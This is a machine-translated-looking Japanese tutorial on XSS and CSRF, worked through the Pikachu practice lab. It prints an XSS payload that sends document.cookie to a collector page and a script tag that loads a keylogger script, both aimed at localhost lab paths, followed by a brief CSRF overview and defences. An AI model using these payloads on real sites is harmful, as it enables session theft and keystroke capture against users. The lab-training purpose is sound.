XSS 脆弱性の概要
XSS (クロスサイト スクリプティング)、つまりクロスサイト スクリプティング攻撃とは、攻撃者が Web サーバーのコードの抜け穴を利用して、クライアント側のスクリプト (通常は JavaScript で書かれた悪意のあるコード) をページに埋め込むことを意味します。サーバーのユーザーが Web サイト内の悪意のあるスクリプト コードを含むページにアクセスすると、ユーザーのブラウザは自動的に悪意のあるコードを読み込んで実行し、攻撃の目的を達成します。
XSS 分類
- 反射型 XSS
- 保存された XSS
- DOM型XSS
XSS の脆弱性を利用して攻撃を実行する方法
XSS を使用してユーザーの Cookie を盗む
ピカチュウのXSSバックグラウンド管理を利用することができ、リフレクティブgetにコードを入力するとXSSバックグラウンド管理の情報を見ることができます。ここでのパスは、独自のファイル パスに基づく必要があります。
<script> document.location = 'http://localhost/pikachu-master/pkxss/xcookie/cookie.php?cookie='+document.cookie; </script>
論理的に言えば、XSS ストレージ タイプも可能ですが、XSS ストレージ タイプ テストを使用する場合、XSS ストレージ インターフェイスに入るたびに、index.php にジャンプすることになることに注意してください。データベースに移動し、挿入されたスクリプトを削除します。データはpikachu.messageにあります。
XSS を使用したフィッシング
PHP の HTTP 認証メカニズムは、PHP が Apache モジュールとして実行されている場合にのみ機能するため、この機能は CGI バージョンでは使用できません。スモールレザーパネルを使用しているため、デフォルトではCGI/FastCGIを使用しており、ピカチュウ射撃場での釣りは成功していません。
XSS を使用したキーボード監視
<script src=" http://localhost/pikachu-master/pkxss/rkeypress/rk.js"></script>
CSRF 脆弱性の概要
CSRF(Cross-Site Request Forgery)、つまりクロスサイトリクエストフォージェリ攻撃。攻撃者は、あなたのログイン情報を盗み、あなたの身元でさまざまなリクエストの送信をシミュレートすることができます。このリクエストはサーバーにとって完全に合法ですが、あなたの名前で電子メールを送信する、メッセージを送信する、アカウントを盗むなど、攻撃者が予期する操作を完了します。システム管理者の追加、商品の購入、仮想通貨の送金なども可能です。
CSRF脆弱性攻撃の状況
- 信頼できる Web サイト A にログインし、ローカルで Cookie を生成します。
- ウェブサイト A からログアウトせずに危険なウェブサイト B にアクセスする
CSRF防御
- HTTP リファラーフィールドを検証する
- トークンを追加して検証する
- HTTP ヘッダーのカスタム属性と検証